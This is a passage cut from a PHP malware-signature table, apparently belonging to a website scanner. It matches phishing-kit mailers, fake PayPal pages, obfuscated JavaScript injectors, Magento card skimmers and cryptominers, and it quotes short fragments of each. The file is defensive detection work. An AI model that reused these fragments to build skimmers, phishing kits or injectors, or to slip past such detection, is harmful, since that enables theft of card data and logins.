			'gd-system-plugin.php' => array(STR_CLEAR_MULTIMATCH, 'php.malware.gd-lib.002', 'require_once\([^;]+gd-system-plugin.php.\);'),
			'require_once($_SERVER["DOCUMENT_ROOT"]."/includes/inc.class.php");' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.189.03', 'require_once\(\$_SERVER\[.DOCUMENT_ROOT.\]\...includes.inc.class.php.\);'),
		),

		'drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);$element=array("#tag' => array(STR_TRIGGER,
			'</script>",);drupal_add_html_head($element' => array(STR_CLEAR_LINEMATCH, 'php.malware.drupal_injection.001', '(?<=_FULL\);)\$element=array\(.#tag.=>[^<]+<.script>.,\);drupal_add_html_head\(.element,.\w+.\);'),
		),

		'@require_once("index");' => array(STR_CLEARLINE, 'php.spam-seo.generic.006', '@require_once("index");'),
		'require_once(dirname(__FILE__) . \'/consumer.php\');' => array(STR_CLEARLINE, 'php.spam-seo.generic.007', 'require_once(dirname(__FILE__) . \'/consumer.php\');'),
		'@require_once(JPATH_SITE.\'/plugins/search/' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.092', '@require_once\\(JPATH_SITE...plugins[^;]+.xml..;'),
		'require_once(ABSPATH .\'wp-includes/\'.\'pomo/\'.' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.001.012', 'if.strpos.\$_SERVER..REQUEST_URI[^;]+require_once.ABSPATH\s*\..wp-includes[^;]+;exit..;\}'),
		'require_once(plugin_dir_path(__FILE__) . "readme.txt");' => array(STR_CLEAR_LINEMATCH, 'php.malware.injector.039', 'require_once\(plugin_dir_path\(__FILE__\)\s*.\s*"readme\.txt"\);'),
		'if\(is_file\([\'"][\/\w+]+\/(img|images)\/\w+\.php[\'"]\)\)\s*require_once\([\'"][\/\w+]+\/img\/\w+\.php["\']\)' => array(REX_CLEAR_MULTIMATCH, 'php.malware.require_once-injection.004', 'if\(is_file\([\'"][\/\w+]+\/(img|images)\/\w+\.php[\'"]\)\)\s*require_once\([\'"][\/\w+]+\/img\/\w+\.php["\']\)'),
	),

	'require_once("files/config.inc")' => array(STR_TRIGGER,
		'$url_array = file("files/url.txt"' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.091', NULL),
		'= str_ireplace(\'</head>\',\'<script type="text/javascript">var \'.str_replace(array(' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.091.03', NULL),
	),

	'.js")' => array(STR_TRIGGER,
		'require("./js/jquery-' => array(STR_CLEAR_MULTIMATCH, 'js.malware.fake_jquery.001', 'require\("\.\/js\/jquery-1\.9\.1\.min\.js"\);'),
	),

	'wp-config.php' => array(STR_PATH_TRIGGER,
		'@require(' => array(STR_CLEAR_LINEMATCH, 'php.malware.require_once-injection.006.02', '\@require\([\'"][^\)]+\)\s*;'),
	),

	'require( dirname(__FILE__) . \'/wp-load.php\' );' => array(STR_TRIGGER,
		'$wpdb->query(\'TRUNCATE TABLE' => array(STR_CLEAR_MULTIMATCH, 'php.malware.db_drop.002', 'require\s*\(\s*dirname\(__FILE__\)\s*\.\s*\'\/wp-load\.php\'\s*\)\s*;\s*global\s*\$wpdb\s*;\s*(\$wpdb\s*->query\(\s*\'\s*TRUNCATE\s*TABLE\s*)\w+\s*\'\);[^\$]+\1\w+_options\'\)\s*;\s*\1\w+_posts\s*\'\)\s*;\s*\1\w+_users\'\)\s*;\s*\1\w+\'\)\s*;'),
	),

	'\@require\(\s*.\s*wp-admin\/\d+\s*.\s*\)\s*;' => array(REX_CLEAR_LINEMATCH, 'php.malware.require_once-injection.006', '\@require\(\s*.\s*wp-admin\/\d+\s*.\s*\)\s*;'),
	'require(\'./wp-content/uploads/ad.php\')' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.require_wp_content.001', '<.php\s*require..\..wp-content.uploads.ad.php.\)\s*.>'),
	'mysql_query("replace into sl_cache values' => array(STR_CLEARFILE, 'php.spam-seo.setlinks_ru.003.02', NULL),
	'xcalendar.php' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.xcalendar.001', 'require_once\([^;]+wp-content.plugins.xcalendar.xcalendar.php..;'),
	'@require_once(\'class.wp-includes.php\');' => array(STR_CLEARLINE, 'php.spam-seo.injector.144.02', '@require_once(\'class.wp-includes.php\');'),
	'[\s]{300,}require(_once)?\(' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.052', '[\s]{300,}require(_once)?\([^;]+\);'),
	'(\$[\w]+[\s]*=[^;]+;[\s]*){5,}\$[\w]+\(\$[\w]+,[\s]*\$[\w]+\((\$[\w]+[\s]*\.[\s]*){3,}\$[\w]+\)\);[\s]*require[\s]*\$[\w]+;' => array(REX_CLEARFILE, 'php.malware.obfuscated.030', NULL),
	'send\(\$_SESSION,[\s]*\$to,[\s]*\$subject\)[\s]*;' => array(REX_CLEARFILE, 'php.phishing.mailer.115', NULL),
),

'$subj' => array(STR_TRIGGER,

	'rand(' => array(STR_TRIGGER,
		'getenv("REMOTE_ADDR");' => array(STR_TRIGGER,
			'$_SERVER[\'HTTP_HOST\'];' => array(STR_TRIGGER,
				'From:' => array(STR_TRIGGER,
					'mail($' => array(STR_CLEARFILE, 'php.hacktool.mailer.111', '\$sitemap_file[\s]*=[^;]+;[\s]*\$num[^;]+;[\s]*\$mapnum[^;]+;[\s]*\$[\w]+[\s]*=[\s]*rand\([^;]+\);[\s]*'),
				),
			),
		),
	),

	'mail($' => array(STR_TRIGGER,
		'windows nt 10' => array(STR_TRIGGER,
			'getenv("REMOTE_ADDR' => array(STR_TRIGGER,
				'curl_setopt($' => array(STR_CLEARFILE, 'php.phishing.netflix.007', NULL),
			),
		),
	),

	'$subject = $_POST["subject"];' => array(STR_TRIGGER,
		'$post = array(' => array(STR_TRIGGER,
			'curl_setopt($ch, CURLOPT_POSTFIELDS, $post);' => array(STR_CLEARFILE,'php.hacktool.mailer.032', NULL),
		),
	),

	'getenv("REMOTE_ADDR");' => array(STR_TRIGGER,
		'mail($send' => array(STR_TRIGGER,
			'Host:' => array(STR_CLEARFILE, 'php.phishing.mailer.079', NULL),
		),
	),

	'@unserialize(file_get_contents(' => array(STR_TRIGGER,
		'mail($' => array(STR_TRIGGER,
			'geoplugin' => array(STR_CLEARFILE, 'php.phishing.mailer.119', NULL),
		),
	),

	'META HTTP-EQUIV=' => array(STR_TRIGGER,
		'$click = fopen(' => array(STR_CLEARFILE, 'php.phishing.mailer.100', NULL),
	),

	'curl_setopt($ch, CURLOPT_URL, "http://mx-api.com' => array(STR_TRIGGER,
		'echo $finish_url;' => array(STR_CLEARFILE, 'php.phishing.mailer.106', NULL),
	),

	'$subject = "Yahoo NNA! | ".$ip."\n";' => array(STR_CLEARFILE, 'php.mailer.generic.009', NULL),
	'$subject="amx| $ip";' => array(STR_CLEARFILE, 'php.mailer.generic.010', NULL),
	'$subj = "hotmail! webmail ";' => array(STR_CLEARFILE, 'php.mailer.generic.011', NULL),
	'$subject = "# SFR ReZulT' => array(STR_CLEARFILE, 'php.mailer.POST.017', NULL),
	'if(mail($email[$i], $subject, $me' => array(STR_CLEARFILE, 'php.hacktool.mailer.005', NULL),
	'mail($messege,$subject,$rnessage,$headers);' => array(STR_CLEARFILE, 'php.phishing.mailer.035', NULL),
	'=============== AtmaCa' => array(STR_CLEARFILE, 'php.mailer.POST.020', NULL),
	'$stats = \'done:\';' => array(STR_CLEARFILE,'php.hacktool.mailer.029', NULL),
	'preg_replace_callback(\'/\[  (.*?)  \]/xs\', "random_words"' => array(STR_CLEARFILE, 'php.mailer.REQUEST.001', NULL),
	'header("Location:http://www.t-online.de/");' => array(STR_CLEARFILE,'php.mailer.POST.032', NULL),
	'$subject = "Bank Info  | $ip";' => array(STR_CLEARFILE, 'php.phishing.mailer.038',NULL),
	'$subject = "Bill Info  | $ip";' => array(STR_CLEARFILE, 'php.phishing.mailer.039',NULL),
	'$subject = "PPL Login : | $ip";' => array(STR_CLEARFILE, 'php.phishing.generic.007',NULL),
	'$subject = "Chase ReZulT | $ip";' => array(STR_CLEARFILE, 'php.phishing.mailer.040',NULL),
	'$subject="New RezuLt | $ip";' => array(STR_CLEARFILE, 'php.mailer.POST.019', NULL),
	'$testa = $_POST[\'veio\'];' => array(STR_CLEARFILE, 'php.mailer.Meg4-mail.001.001', NULL),
	'-+ SFR Card  +-' => array(STR_CLEARFILE, 'php.phishing.sfr.002',NULL),
	'$subject = "LOG-Pp  | $ip";' => array(STR_CLEARFILE, 'php.phishing.paypal.001.05', NULL),
	'$subject = "BOA' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.004', NULL),
	'Visa Resultz' => array(STR_CLEARFILE, 'php.phishing.visa.001.02', NULL),
	'$codec = $_POST[\'feedbacknow\'];' => array(STR_CLEARFILE, 'php.phishing.mailer.047', NULL),
	'header ("Location: success.php?email=$' => array(STR_CLEARFILE, 'php.phishing.mailer.049.05', NULL),
	'header ("Location: invalid.php?email=$' => array(STR_CLEARFILE, 'php.phishing.mailer.049.06', NULL),
	'header ("Location: success.html")' => array(STR_CLEARFILE, 'php.phishing.mailer.049.04', NULL),
	'window.top.location.href = "https://login.microsoftonline.com' => array(STR_CLEARFILE, 'html.phishing.microsoft.009', NULL),
	'$subject="Client Details' => array(STR_CLEARFILE, 'php.phishing.mailer.058',NULL),
	'$subject = "LOGIN NETFLIX [' => array(STR_CLEARFILE, 'php.phishing.netflix.005', NULL),
	'require_once(\'geoplugin.class.php\');' => array(STR_CLEARFILE, 'php.phishing.mailer.076', NULL),
	'Learning Toolkit Using Latter GX40' => array(STR_CLEARFILE, 'html.phishing.apple.018.03', NULL),
),

'paypal' => array(STR_TRIGGER,

	'<title>' => array(STR_TRIGGER,
		'<title>Security - PayPal Europe</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.001.009', NULL),
		'<title>CHECKER PAYPAL BY ANONISMA </title>' => array(STR_CLEARFILE, 'php.hacktool.paypal_checker_anonisma.001', NULL),
		'<title>PayPal Service Update<' => array(STR_CLEARFILE, 'html.phishing.paypal.008', NULL),
		'<title>Your account is Limited</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.012', NULL),
		'<title>PayPal Email Validity Checker' => array(STR_CLEARFILE, 'php.hacktool.paypal_email_validator.002', NULL),
		'<title>The Joker Private Checker</title>' => array(STR_CLEARFILE, 'php.hacktool.ppcheck.008', NULL),
		'$(location).attr("href", "myaccount?cmd=_update&dispatch=<?php echo $dis ?>&locale=en_<?php echo $countrycode ?>");' => array(STR_CLEARFILE, 'php.phishing.paypal.011', NULL),
		'<title>Update payment information</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.010.03', NULL),
		'<title>File Upload Form</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.010.04', NULL),
		'<title>Log in to your PayPal account</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.020', NULL),
		'ersonal information update</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.010.05', NULL),
		'<p>Please complete verification steps to restore your credit cards</p>' => array(STR_CLEARFILE, 'php.phishing.paypal.018', NULL),
	),

	'CURL' => array(STR_TRIGGER,
		'<title>PayPal Valid Email Detect Country' => array(STR_CLEARFILE, 'php.hacktool.paypal_email_validator.001', NULL),
		'<title>#ScannerID - PayPal Checker' => array(STR_CLEARFILE, 'php.hacktool.ppcheck.001', NULL),
		'TrojanzBoy<br>Paypal Checker</font></p>' => array(STR_CLEARFILE, 'php.hacktool.ppcheck.002', NULL),
		'$_CheckAction = curl(\'https://www.paypal.com' => array(STR_CLEARFILE, 'php.hacktool.ppcheck.003', NULL),
		'$ketqua = $mailx->check($email' => array(STR_CLEARFILE, 'php.hacktool.ppcheck.004', NULL),
		'$this->fetch_value($run,\'s.eVar36="' => array(STR_CLEARFILE, 'php.hacktool.paypal_email_validator.004', NULL),
		'CURLOPT_URL, \'https://history.paypal.com' => array(STR_CLEARFILE, 'php.phishing.paypal.020', NULL),
		'email\":\"service@paypalid.com\"}]' => array(STR_CLEARFILE, 'php.phishing.paypal.021', NULL),
	),

	'=rand(' => array(STR_TRIGGER,
		'://www.paypal.de-' => array(STR_CLEARFILE, 'php.phishing.redirect.036', NULL),
	),

	'content="PayPal is the safer, easier way' => array(STR_CLEARFILE, 'html.phishing.paypal.001', NULL),
	'content="PayPal is the faster, safer way' => array(STR_CLEARFILE, 'html.phishing.paypal.001.005', NULL),
	'Confirm debit or credit card - PayPal' => array(STR_CLEARFILE, 'html.phishing.paypal.001.006', NULL),
	'content="Sign Up for PayPal:' => array(STR_CLEARFILE, 'html.phishing.paypal.003', NULL,1),
	'<p class="copyright"><span class="securePage">Secure page</span>PayPal' => array(STR_CLEARFILE, 'php.phishing.paypal.001.07', NULL,1),
	'$message .= "cvv: ".$_POST' => array(STR_CLEARFILE, 'php.phishing.mailer.033', NULL),
	'<div id="headline"><h2 class="accessAid"><?php echo $processing; ?></h2>' => array(STR_CLEARFILE, 'php.phishing.paypal.001.03', NULL),
	'belongs to an existing PayPal/i", $last_http_page' => array(STR_CLEARFILE, 'php.phishing.paypal.002', NULL),
	'$scam = "Updateto";' => array(STR_CLEARFILE, 'php.phishing.paypal.005', NULL),
	'class="nonjsAlert">NOTE: Many features on the PayPal ' => array(STR_CLEARFILE, 'html.phishing.paypal.001.008', NULL, 1),
	'>Log in to your PayPal account as soon as possible' => array(STR_CLEARFILE, 'html.phishing.paypal.013', NULL),
	'zpaypal_\'.$_SERVER[\'SERVER_NAME\'].\'_\'.@date' => array(STR_CLEARFILE, 'php.phishing.paypal.024', NULL),
	'Pay Pal. All rights reserved.' => array(STR_CLEARFILE, 'html.phishing.paypal.027', NULL),
),

'String' => array(STR_TRIGGER,

	'String.fromCharCode(' => array(STR_TRIGGER,

		'String.fromCharCode(104, 116, 116, 112,' => array(STR_TRIGGER,
			
			'.parentNode.insertBefore(' => array(STR_TRIGGER,
				'(function(){ var' => array(STR_TRIGGER,
					'document.getElementsByTagName("script")[0];' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector_stats.005', '\(function\(\)\{ var [\w]+[\s]*=[\s]*document\.createElement\(.script.\),[\s]*[\w]+=[\s]*document\.getElementsByTagName[^}]+String\.fromCharCode\(104[^}]+\}\)\(\);'),
				),
			),

			'fromCharCode(104, 116, 116' => array(STR_TRIGGER,
				'var _0x[\w]+[\s]*=[\s]*function\(_0x[\w]+,[\s]*_0x[\w]+\)[\s]*\{[\s]*var [\w]+[\s]*=[\s]*document\.createElement\(.script.\)' => array(REX_CLEAR_MULTIMATCH, 'js.malware.injector_stats.001.02', 'var _0x[\w]+[\s]*=[\s]*function\(_0x[\w]+,[\s]*_0x[\w]+\)[\s]*\{[\s]*var [\w]+[\s]*=[\s]*document\.createElement\(.script.\)[^\}]+\}[\s]*else[^\)]+\)[\s]*\{[\s]*document\.head\.appendChild\([\w]+\);[\s]*\}'),
			),

			'var need_t = true;' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector_stats.002', 'var (\w+) = document.createElement\(.script.\); \1.type = .text.javascript.; \1.src = String.fromCharCode\(104, 116, 116, 112,[^\)]+0?46, 106, 115[^;]+; var (\w+) = document.getElementsByTagName\(.script.\);\s+var need_t = true[^\n]+document.head.appendChild\(\1\);\}'),
			'String.fromCharCode(115, 99, 114, 105, 112, 116))' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector_stats.003', 'var (\w+) *= *document.createElement\(String.fromCharCode\(115, 99, 114, 105, 112, 116\)\); \1.src *= *String.fromCharCode\(104, 116, 116, 112,[^\)]+0?46, 106, 115[^;]+; sc.type = String.fromCharCode\(116, 101, 120, 116, 47[^;]+; *document.getElementsByTagName\([^;]+\.appendChild\(\1\);'),
			'String.fromCharCode(104, 116, 116,' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector_stats.001', '(var [\w]+[\s]*=[^;]+;[\s]*)+[\w]+\.type[\s]*=[^;]+;[^\(<]+String\.fromCharCode\(104[^;]+\);[^<!]+\.appendChild\([\w]+\);[\s]*\}?'),
		),

		'return String.fromCharCode(' => array(STR_TRIGGER,

			's.onerror=x.onerror=E;s.onload=x.onload=g;x.send();' => array(STR_TRIGGER,

				'\x77\x72\x69\x74\x65\x6C\x6E' => array(STR_TRIGGER,
					')</script> ","\x77\x72\x69\x74\x65\x6C\x6E"];document[_0x' => array(STR_CLEAR_MULTIMATCH, 'js.malware.unwanted-ads.016.02', '\(function\(\$,document\)\{var[\s]*doc=document;if\(doc\[\$.[\w]*\]&&!doc\[\$.[\w]*\][^@]+[\d]*\);\}\}\);\}\([\w]*\)\);\}return[^>]+indexOf\([\w]*\[[\w]*\]\)>[^\/]+;\}\)\(document\)\)<.script><script>\(function\([^\}]+\);\}function[^,]+,[\w]+,[\w]+[\s]*XMLHttpRequest\(\),document.createElement\([^\)]+\),_[\w]+\)'),
				),

				's.onerror=x.onerror=E;s.onload=x.onload=g;x.send();(document.body||document.documentElement).appendChild(s);function' => array(STR_CLEAR_MULTIMATCH, 'js.malware.unwanted-ads.016', '\(function\(\$,document\)\{var[\s]*doc=document;if\(doc\[\$.[\w]*\]&&!doc\[\$.[\w]*\][^@]+[\d]*\);\}\}\);\}\([\w]*\)\);\}return[^>]+indexOf\([\w]*\[[\w]*\]\)>[^\/]+;\}\)\(document\)\)<.script><script>\(function\([^\}]+\);\}function[^,]+,[\w]+,[\w]+[\s]*XMLHttpRequest\(\),document.createElement\([^\)]+\),_[\w]+\)'),
			),

			
			'#co-billing-form' => array(STR_TRIGGER,
				'return btoa(encodeURIComponent(str).replace(' => array(STR_TRIGGER,
					'$newform = $(\'<form action="\'+geUrl+' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.109', '\(function\(\)[\s]*\{[\s]*try[\s]*\{[\s]*var[\s]*LoaderFunc[\s]*=[\s]*function\(\)[\s]*\{[\s]*\(function\(\$\)[\s]*\{[\s]*var[\s]*b64EncodeUnicode[\s]*=[\s]*function[\s]*\(str\)[\s]*\{[\s]*return[\s]*btoa\(encodeURIComponent\(str\)\.replace\([^\_]+\$newform.append\([^@]+document.addEventListener\(.DOMContentLoaded.,[\s]*function\(\)[\s]*\{[\s]*initFunc\(\);[\s]*\}\);[\s]*\}[\s]*\}[\s]*catch\([\w]+\)[\s]*\{[\s]*\}[\s]*\}[\s]*\)[\s]*\(\);'),
				),
			),

			'function [\w]+\(\)[\s]*\{[\s]*[\w]+[\s]*=[\s]*[\w]+\(\);[\s]*[\w]+[\s]*=[\s]*\[[\d\s,]{30,}\];[\s]*return [\w]+\([\w]+,[\s]*[\w]+\);[\s]*\}' => array(REX_CLEARFILE, 'js.spam-seo.redirect.046', NULL),
			'selectedIndex].innerText:\'\'};function detect(detector,callback,try_after){var interval' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.108', '\(function\(\)[\s]*\{[\s]*try[\s]*\{[\s]*document\.getElementById[^_]+var cookiename[^;]+;[\s]*detect\(function[^<]+\}[\(\)]+;?'),
		),

		'String.fromCharCode(104,116,116' => array(STR_TRIGGER,

			'document.getElementsByTagName(String.fromCharCode(' => array(STR_TRIGGER,

				'false;(function()' => array(STR_TRIGGER,
					'Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function()' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.048.03', 'Element\.prototype\.appendAfter = function.element. \{element\.parent[^\{]+\{[\s]*var[\s]*[\w]+[\s]*=[\s]*document\.createElement\(String\.fromCharCode\([^\}]+appendChild\([\w]+\);[\s]*\}[\s]*\)[\s]*\(\);'),
				),

				'createElement(String.fromCharCode' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.048.02', 'var [\w]+[\s]*=[\s]*String\.fromCharCode\([\d]+[^\}]+document\.currentScript\);[\s]*\}[\s]*else[\s]*\{[\s]*[\w]+\.getElementsByTagName\(String\.fromCharCode[^\}]+childNodes\[[\d]+\]\);[\s]*\}'),
			),

			'document.currentScript.parentNode.insertBefore(s, document.currentScript);' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.048', 'var [\w]+[\s]*=[\s]*[\d]+;[\s]*var [\w][\s]*=[\s]*document;[\s]*var [\w][\s]*=[\s]*.\.createElement\(.script[^\}]+s, document\.currentScript\);[\s]*\}[\s]*else[^\}]+appendChild\(s\);[\s]*\}'),
			'getElementsByTagName(String.fromCharCode(104,101,97,100))' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.064', 'if\(document.head\)[\s]*\{[\s]*var[\s]*[\w]*[\s]*=[\s]*document;[\s]*var[\s]*[\w]*[\s]*=[\s]*[\w]*\.createElement\(String\.fromCharCode\(([\d]+,)*[\d]+\)\);[^\}]+getElementsByTagName\(String.fromCharCode\(([\d]+,)*[\d]+\)\)[\s]*\[[\d]+\].appendChild\([\w]+\);\}'),
			'(){if(document.cookie.indexOf("wp-settings")>' => array(STR_CLEAR_MULTIMATCH, 'php.malware.infector.003', 'function [\w]+\(\)[\s]*\{[\s]*if[\s]*\(document\.cookie\.indexOf\(.wp-settings.\)[\s]*>-[\d]+\)[\s]*\{[\s]*[^;]+\);[\s]*window\.stop\(\);[^\n]+[\w]+\(\)'),
		),

		'eval(String.fromCharCode(118, 97, 114, 32,' => array(STR_TRIGGER,

			'fromCharCode(118' => array(STR_TRIGGER,
				'var [\w]+[\s]*=[\s]*[\d]+;[\s]*eval\(String\.fromCharCode\(118' => array(REX_CLEAR_LINEMATCH, 'js.malware.injector_stats.004.04', 'var [\w]+[\s]*=[\s]*[\d]+;[\s]*eval\(String\.fromCharCode\(118,[\s\d,]{500}[^\)]+\)+;?'),
			),

			'83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44,' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector_stats.004', 'eval\(String.fromCharCode\(118[\s]*,[\s]*97[\s]*,[\s]*114[\s]*,[\d,\s]{500}[^\)]+\)\);?'),
			'83, 116, 114, 105, 110, 103, 91, 34, 92, 120, 54, 54, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 52, 51, 92, 120, 54, 56, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 52, 51, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector_stats.004.02', 'eval\(String\.fromCharCode\(118, 97, 114, 32[\d\,\s]{20,250}83, 116, 114, 105, 110, 103, 91, 34, 92, 120, 54, 54, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 52, 51, 92, 120, 54, 56, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 52, 51, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53,[^\)]+\)\)\s*;'),
			'100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector_stats.004.03', 'eval\(String\.fromCharCode\(118, 97, 114, 32[\d\,\s]{20,250}[^\)]+\)\)\s*;'),
		),

		'119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102' => array(STR_TRIGGER,
			'100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101' => array(STR_TRIGGER,
				'100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.045', '(var [\w]+[\s]*=[\s][\d]+;[\s]*)?eval\(String\.fromCharCode\([\d]+,[\s]*[\d]+[^;]+\);'),
			),
		),

		'eval(function(' => array(STR_TRIGGER,
			'.push(String.fromCharCode(parseInt(' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.048', 'eval\(function\(\w+[^{]+{\s*var\s*(\w+)\s*=\s*\w+\s*;\s*var[^{]+{\s*if\s*\(\1[^{]+{\s*var\s*\w+\s*=\-?\s*\d+\s*;\s*if\(\w+\.charCodeAt\(\w+\)[^}]+}\s*return\s*\w+\.join\([\'"]{2}\)\s*;\s*}\s*\([\'"][^;]+;'), 
		),

		'String.fromCharCode(71,69,84)' => array(STR_TRIGGER,
			'new XMLHttpRequest\(\);[\s]*[\w]+\.open[\s]*\([\s]*String\.fromCharCode\(71,69,84\)[^}]+responseText;\}' => array(REX_CLEAR_LINEMATCH, 'php.spam-seo.redirect.116', 'var .[\s]*=[\s]*[\d]+;[\s]*var [\w]+[\s]*=[\s]*String\.fromCharCode\([^;]+[^}]+\}[\s]*function[^\}]+responseText;[\s]*\}[\s]*function[^\}]+[\w]+\([\d]+,[\s]*[\d]+\)[\s]*;[\s]*\}'),
		),

		'server="ws://#";startMining("#",' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.029', 'var server=.wss:[^,]+,job=null,workers=\[\][^\$]+startMining\([^\)]+\);[\s]*throttleMiner[\s]*=[^;]+;'),
		'var[\s]*[\w]+[\s]*=[\s]*[\'"][^;]{1000,}[\'"];[\s]*function [\w]\([\w]\)[\s]*\{var [\w][\s]*=[\s]*..;[^\{]+\{[\s]*[\w][\s]*\+=[\s]*String\.fromCharCode[^\}]+\}[\s]*return[^\}]+\}[^;]+;[\s]*eval\(.\);?' => array(REX_CLEARFILE, 'js.malware.cryptominer.032', NULL),
	),

	'GetCCInfo' => array(STR_TRIGGER,

		'var hex_chr' => array(STR_TRIGGER,

			'var JSON=JSON||{};' => array(STR_TRIGGER,
				'var JSON=JSON||{};JSON.stringify=JSON' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.051', 'var JSON=JSON\|\|\{\};[\s]*JSON\.stringify[^>]+var hex_chr[\s]*=[^;]+;[\s]*function[\s]*rhex\(i\)[^!]+HolderLastName[^\?]+\?hash[^>]+>>[^#]+if\(document\.getElementById\(\$[\w]+\.CVV\)\)[\s]*document\.getElementById\(\$[\w]+\.CVV\)\.value[^;]+;[\s\}]+'),
			),
			
			'JSON.parse($s.Base64.decode(Cookies.get("$sent")));' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.051.02', '\(function\(\)\{function .\(.,.\)\{function[^@]+[\'"]@[\'"][^_]+var hex_chr[^:]+rhex\([^\]]+var[\s]*\$[\w]+[\s]*=[\s]*\{[\s]*Number:[\s]*.[^,]+,[\s]*Holder:[^\*]+CVV\)\.value[\s]*=[\s]*..;[\}\s]+'),
			',\'GetCCInfo\',' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.051.03', 'var _0x[\w]+=\[[^\@]+.@.;for\([^\n]+value.\]=..;\}\};'),
		),

		'var _0x[\w]+=\[[^\]]{2000,}\];[\s]*\(function[^\n]+\}\}' => array(REX_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.051.04', 'var _0x[\w]+=\[[^\]]{2000,}\];[\s]*\(function[^\n]+\}\};?'),
	),

	'()[(!' => array(STR_TRIGGER,
		'() { return this; };' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.058', 'var ([\w]+) = .[\w]{15,}.;[\s]*function ([\w]+)\(\) \{ return this; \};[\s]*\2\(\)\[\([^\)]+\)\[[\d]+\] \+[^;]+\]\(\(.[\w;\+=\']{100,}[^\)]+\)\[[^\)]+\)+'), 
	),

	'iner=new CRLT.Anonymous(' => array(STR_TRIGGER,
		'var _0xe6af=[\'min\',\'postMessage\',\'CRLT' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.028', 'var _0x[\w]+[\s]*=[\s]*\[.min...postMessage...CRLT[^;]+\];[\s]*\(function[^!]+!\[\][^{]+\{\};[\s]*function[^:]+site_key.:[^<]+<[^!]+!=[^\+]+\+[^\}]+\}[\s]*var[\s]*miner=new CRLT[^\)]+\);[\s]*miner\.start\([^;]+\);'),
	),

	'return WSH.CreateObject(' => array(STR_TRIGGER,
		'noSign.O[0].text = obaAdedapo[0][0].replace(noSign.I, "A");' => array(STR_CLEARFILE, 'js.malware.dropper.001', NULL),
	),

	'String["fromCharCode' => array(STR_TRIGGER,
		'"split";e=eval;' => array(STR_CLEAR_MULTIMATCH, 'js.malware.iframe_injector.017', '[\w]+[\s]*=[\s]*.split.;[\s]*[\w]+[\s]*=[\s]*eval;[^[]+if\(![\w]+\)\{try\{[^<]+for\([\w]+=[\d]+;[\w]+<[\w]+\.length;[\w]+\+\+\)\{[\w]+\+=String\[.fromCharCode.\]\([\w]+\([\w]+\+\([\w]+[^\}]+\}[\w]+=[\w]+;[\w]+\([\w]+\);\}'),
	),
),

'chr' => array(STR_TRIGGER,

	'\.\s*chr\(\d+\)\s*\.' => array(REX_TRIGGER, 

		'base64_decode(chr(' => array(STR_TRIGGER,

			').getcwd' => array(STR_TRIGGER,
				'($_POST[base64_decode(' => array(STR_CLEARFILE, 'php.defaced.encrypted.003', NULL),
			),

			'(str_shuffle(MD5($' => array(STR_CLEARFILE, 'php.malware.cryptominer.011', NULL),
		),

		'@eval($' => array(STR_TRIGGER,
			'if(empty($_SESSION[' => array(STR_TRIGGER,
				'$get.=chr(' => array(STR_TRIGGER,
